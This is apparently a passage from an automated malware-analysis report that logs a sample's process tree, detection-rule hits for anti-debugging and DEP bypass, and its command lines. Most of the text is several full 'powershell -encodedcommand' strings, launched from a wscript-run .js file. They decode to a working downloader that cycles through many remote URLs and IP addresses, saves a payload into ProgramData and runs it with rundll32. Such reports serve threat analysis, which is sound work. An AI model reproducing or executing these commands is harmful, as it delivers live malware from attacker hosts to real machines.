NgBBAEMAOABBAEwAdwBBADEAQQBEAGcAQQBMAGcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQARQBBAE4AZwBBAHgAQQBDADQAQQBNAFEAQQA0AEEARABNAEEASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAE0AQQBPAFEAQQB1AEEARABFAEEATwBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGsAQQBMAGcAQQA1AEEARABBAEEAIgA7ACQATgBvAG4AcAB1AG4AYwB0AHUAYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABVAEEATABnAEEAeABBAEQAawBBAE4AQQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABnAEEATQBBAEEAPQAiADsAJABjAG8AdQBuAHQAZQByAHIAbwB1AG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABjAEEATABnAEEAeABBAEQAZwBBAE4AdwBBAHUAQQBEAFkAQQBNAEEAQQA9AHMAaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQATQBBAEwAZwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgBRAEEANQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABsAGEAbgBvAGwAaQBuAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAOABBAGQAZwBCAGwAQQBIAEkAQQBkAEEAQgBvAEEASABJAEEAWgBRAEIAMwBBAEUAdwBBAFkAUQBCAGsAQQBHAGsAQQBaAGcAQgA1AEEAQwA0AEEAWgBRAEIAaABBAEgASQBBAGQAQQBCAG8AQQBBAD0APQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBZAFEAQgA1AEEASABVAEEAYwB3AEIAbABBAEgATQBBAFQAQQBCAGgAQQBHAEkAQQBiAHcAQgB5AEEARwBFAEEAYgBnAEIAMABBAEMANABBAGQAQQBCAHAAQQBIAEkAQQBiAHcAQgBzAEEAQQA9AD0ARABUAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBnAEEAdQBBAEQAWQBBAE8AUQBBAHUAQQBEAFEAQQBOAHcAQQB1AEEARABjAEEATwBBAEEAPQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGcAQQBOAGcAQQB1AEEARABFAEEATQB3AEEAeQBBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAPQAiADsAJABjAHIAdQBzAHQAYQBjAGUAbwBsAG8AZwBpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE4AZwBBAHUAQQBEAEUAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAFkAQQBOAFEAQQA9AE4AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATwBRAEEAPQBOAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEcAVQBBAGMAdwBCAGoAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEAVQBBAEIAeQBBAEcAVQBBAGMAdwBCADAAQQBHAGsAQQBaAHcAQgBwAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAHcAQQBiAHcAQgBoAEEARwA0AEEATgBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBOAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAUQBBAEwAZwBBAHgAQQBEAEEAQQBNAHcAQQA9ACIAOwAkAHMAdABvAHIAYQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABZAEEATABnAEEAMQBBAEQAVQBBAEwAZwBBADAAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEAegBVAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATgBRAEEAdQBBAEQAawBBAE4AUQBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBnAEEAdwBBAEQAWQBBAHoAVQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGEAUQBCADIAQQBHAFUAQQBkAEEAQgB2AEEARwA0AEEAWgBRAEIAUwBBAEcARQBBAGIAUQBCAHoAQQBIAFEAQQBaAFEAQgBoAEEARwBRAEEATABnAEIAcwBBAEgAUQBBAFoAQQBCAGgAQQBBAD0APQB6AFUAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGwAQQBHADQAQQBkAEEAQgB5AEEARwBFAEEAYQBRAEIAdQBBAEMANABBAGEAUQBCAHoAQQBBAD0APQAiADsAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAEEAQQBMAGcAQQA0AEEARABnAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBOAEEAQQB6AEEAQwA4AEEAVwBRAEIAcQBBAEYASQBBAEwAdwBCAEgAQQBFADgAQQBkAGcAQgA0AEEARQBVAEEAcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABFAEEATQB3AEEANABBAEMANABBAE8AQQBBADIAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATAB3AEIAcABBAEcARQBBAEwAdwBCAEsAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE8AQQBBAHUAQQBEAFUAQQBOAHcAQQB1AEEARABFAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAHcAQgBNAEEASABBAEEATQBRAEIAcQBBAEgAWQBBAEwAdwBCAFQAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBHADAAQQBNAEEAQgBHAEEARwBjAEEAUgB3AEEAMwBBAEcAcwBBAGIAZwBBAD0AcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARQB3AEEAVwBBAEIAdABBAEQASQBBAE4AUQBCAFQAQQBHAEUAQQBTAEEAQgBOAEEARgBvAEEATQB3AEEAPQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHQAQQBIAEEAQQBhAEEAQgBJAEEARQBnAEEAYwBRAEIARwBBAEUAdwBBAFEAdwBCAHIAQQBGAGcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB0AGEAdABhAHUAcABhAEQAaQBnAGkAdABhAGwAaQBuACAAaQBuACAAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAAtAHMAcABsAGkAdAAgACIAcQBzAHQAZgAiACkAIAB7AHQAcgB5ACAAewAkAFMAYQBuAGcAdQBpAHMAdQBnAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAFEAQQAwAEEARABRAEEATABnAEEAMABBAEQAUQBBAE4AcgBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCADMAQQBHADgAQQBjAGcAQgByAEEASABNAEEATABnAEIAbgBBAEcAawBBAFoAZwBCADAAQQBIAE0AQQBOAHIAZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGcAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQAyAEEAQQA9AD0ATgByAGQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AUQBBAHcAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEANABBAEQATQBBACIAOwAkAHAAaABvAGwAaQBvAHQAYQBVAG4AYQBnAHIAZQBlAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAYQB0AGEAdQBwAGEARABpAGcAaQB0AGEAbABpAG4AKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABwAGgAbwBsAGkAbwB0AGEAVQBuAGEAZwByAGUAZQBpAG4AZwAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABnAHIAdQBuAHQAbABpAG4AZwBNAGUAdABoAGUAcgAuAGcAZQBvAG0AYQBuAHQAaQBjAFQAaAB5AHIAbwBpAGQAZQBhADsAJAB3AGgAbwBsAGUAcwBhAGwAZQBuAGUAcwBzAEkAbgB0AHUAYgBhAHQAbwByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYwBnAEIAbABBAEgAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgB0AEEARwBrAEEAZABBAEIAMABBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBZAGcAQgBsAEEASABRAEEATQBBAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATwBBAEEAdQBBAEQAWQBBAE8AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABZAEEATwBRAEEAPQBNAEEAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBZAHcAQgBqAEEARwBrAEEAWgBBAEIAbABBAEcANABBAGQAQQBCAHMAQQBIAGsAQQBMAGcAQgAzAEEARwBVAEEAWgBBAEIAawBBAEcAawBBAGIAZwBCAG4AQQBBAD0APQAiADsAJABVAG4AZABlAHIAYwByAHUAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAGcAQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZwByAHUAbgB0AGwAaQBuAGcATQBlAHQAaABlAHIALgBnAGUAbwBtAGEAbgB0AGkAYwBUAGgAeQByAG8AaQBkAGUAYQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAMwA2ADMAMAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwBjAEEAYwBnAEIAMQBBAEcANABBAGQAQQBCAHMAQQBHAGsAQQBiAGcAQgBuAEEARQAwAEEAWgBRAEIAMABBAEcAZwBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBsAEEARwA4AEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHAAQQBHAE0AQQBWAEEAQgBvAEEASABrAEEAYwBnAEIAdgBBAEcAawBBAFoAQQBCAGwAQQBHAEUAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEwAbwB0AG0AZQBuAHQATgBlAHAAaAByAG8AZABpAG4AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBVAEEAWQBnAEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAEUAQQBiAEEAQgBwAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAFkAUQBCAHMAQQBDADQAQQBhAFEAQgB6AEEAQQA9AD0ASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGcAQQBMAGcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQARQBBAE4AZwBBAHgAQQBDADQAQQBNAFEAQQA0AEEARABNAEEASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAE0AQQBPAFEAQQB1AEEARABFAEEATwBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGsAQQBMAGcAQQA1AEEARABBAEEAIgA7ACQATgBvAG4AcAB1AG4AYwB0AHUAYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABVAEEATABnAEEAeABBAEQAawBBAE4AQQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABnAEEATQBBAEEAPQAiADsAJABjAG8AdQBuAHQAZQByAHIAbwB1AG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABjAEEATABnAEEAeABBAEQAZwBBAE4AdwBBAHUAQQBEAFkAQQBNAEEAQQA9AHMAaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQATQBBAEwAZwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgBRAEEANQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\wscript.exe" "C:\ProgramData\angiolithApodyterium.js" NodulationSophia coshersButlerage swearer tarsal | ||||||
parent_process | wscript.exe | martian_process | wscript "C:\ProgramData\angiolithApodyterium.js" NodulationSophia coshersButlerage swearer tarsal | ||||||
parent_process | wscript.exe | martian_process | powershell -encodedcommand "JABsAGEAbgBvAGwAaQBuAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAOABBAGQAZwBCAGwAQQBIAEkAQQBkAEEAQgBvAEEASABJAEEAWgBRAEIAMwBBAEUAdwBBAFkAUQBCAGsAQQBHAGsAQQBaAGcAQgA1AEEAQwA0AEEAWgBRAEIAaABBAEgASQBBAGQAQQBCAG8AQQBBAD0APQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBZAFEAQgA1AEEASABVAEEAYwB3AEIAbABBAEgATQBBAFQAQQBCAGgAQQBHAEkAQQBiAHcAQgB5AEEARwBFAEEAYgBnAEIAMABBAEMANABBAGQAQQBCAHAAQQBIAEkAQQBiAHcAQgBzAEEAQQA9AD0ARABUAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBnAEEAdQBBAEQAWQBBAE8AUQBBAHUAQQBEAFEAQQBOAHcAQQB1AEEARABjAEEATwBBAEEAPQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGcAQQBOAGcAQQB1AEEARABFAEEATQB3AEEAeQBBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAPQAiADsAJABjAHIAdQBzAHQAYQBjAGUAbwBsAG8AZwBpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE4AZwBBAHUAQQBEAEUAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAFkAQQBOAFEAQQA9AE4AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATwBRAEEAPQBOAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEcAVQBBAGMAdwBCAGoAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEAVQBBAEIAeQBBAEcAVQBBAGMAdwBCADAAQQBHAGsAQQBaAHcAQgBwAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAHcAQQBiAHcAQgBoAEEARwA0AEEATgBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBOAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAUQBBAEwAZwBBAHgAQQBEAEEAQQBNAHcAQQA9ACIAOwAkAHMAdABvAHIAYQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABZAEEATABnAEEAMQBBAEQAVQBBAEwAZwBBADAAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEAegBVAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATgBRAEEAdQBBAEQAawBBAE4AUQBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBnAEEAdwBBAEQAWQBBAHoAVQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGEAUQBCADIAQQBHAFUAQQBkAEEAQgB2AEEARwA0AEEAWgBRAEIAUwBBAEcARQBBAGIAUQBCAHoAQQBIAFEAQQBaAFEAQgBoAEEARwBRAEEATABnAEIAcwBBAEgAUQBBAFoAQQBCAGgAQQBBAD0APQB6AFUAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGwAQQBHADQAQQBkAEEAQgB5AEEARwBFAEEAYQBRAEIAdQBBAEMANABBAGEAUQBCAHoAQQBBAD0APQAiADsAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAEEAQQBMAGcAQQA0AEEARABnAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBOAEEAQQB6AEEAQwA4AEEAVwBRAEIAcQBBAEYASQBBAEwAdwBCAEgAQQBFADgAQQBkAGcAQgA0AEEARQBVAEEAcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABFAEEATQB3AEEANABBAEMANABBAE8AQQBBADIAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATAB3AEIAcABBAEcARQBBAEwAdwBCAEsAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE8AQQBBAHUAQQBEAFUAQQBOAHcAQQB1AEEARABFAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAHcAQgBNAEEASABBAEEATQBRAEIAcQBBAEgAWQBBAEwAdwBCAFQAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBHADAAQQBNAEEAQgBHAEEARwBjAEEAUgB3AEEAMwBBAEcAcwBBAGIAZwBBAD0AcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARQB3AEEAVwBBAEIAdABBAEQASQBBAE4AUQBCAFQAQQBHAEUAQQBTAEEAQgBOAEEARgBvAEEATQB3AEEAPQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHQAQQBIAEEAQQBhAEEAQgBJAEEARQBnAEEAYwBRAEIARwBBAEUAdwBBAFEAdwBCAHIAQQBGAGcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB0AGEAdABhAHUAcABhAEQAaQBnAGkAdABhAGwAaQBuACAAaQBuACAAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAAtAHMAcABsAGkAdAAgACIAcQBzAHQAZgAiACkAIAB7AHQAcgB5ACAAewAkAFMAYQBuAGcAdQBpAHMAdQBnAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAFEAQQAwAEEARABRAEEATABnAEEAMABBAEQAUQBBAE4AcgBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCADMAQQBHADgAQQBjAGcAQgByAEEASABNAEEATABnAEIAbgBBAEcAawBBAFoAZwBCADAAQQBIAE0AQQBOAHIAZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGcAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQAyAEEAQQA9AD0ATgByAGQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AUQBBAHcAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEANABBAEQATQBBACIAOwAkAHAAaABvAGwAaQBvAHQAYQBVAG4AYQBnAHIAZQBlAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAYQB0AGEAdQBwAGEARABpAGcAaQB0AGEAbABpAG4AKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABwAGgAbwBsAGkAbwB0AGEAVQBuAGEAZwByAGUAZQBpAG4AZwAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABnAHIAdQBuAHQAbABpAG4AZwBNAGUAdABoAGUAcgAuAGcAZQBvAG0AYQBuAHQAaQBjAFQAaAB5AHIAbwBpAGQAZQBhADsAJAB3AGgAbwBsAGUAcwBhAGwAZQBuAGUAcwBzAEkAbgB0AHUAYgBhAHQAbwByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYwBnAEIAbABBAEgAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgB0AEEARwBrAEEAZABBAEIAMABBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBZAGcAQgBsAEEASABRAEEATQBBAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATwBBAEEAdQBBAEQAWQBBAE8AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABZAEEATwBRAEEAPQBNAEEAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBZAHcAQgBqAEEARwBrAEEAWgBBAEIAbABBAEcANABBAGQAQQBCAHMAQQBIAGsAQQBMAGcAQgAzAEEARwBVAEEAWgBBAEIAawBBAEcAawBBAGIAZwBCAG4AQQBBAD0APQAiADsAJABVAG4AZABlAHIAYwByAHUAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAGcAQQBMAGcAQQAwAEEARA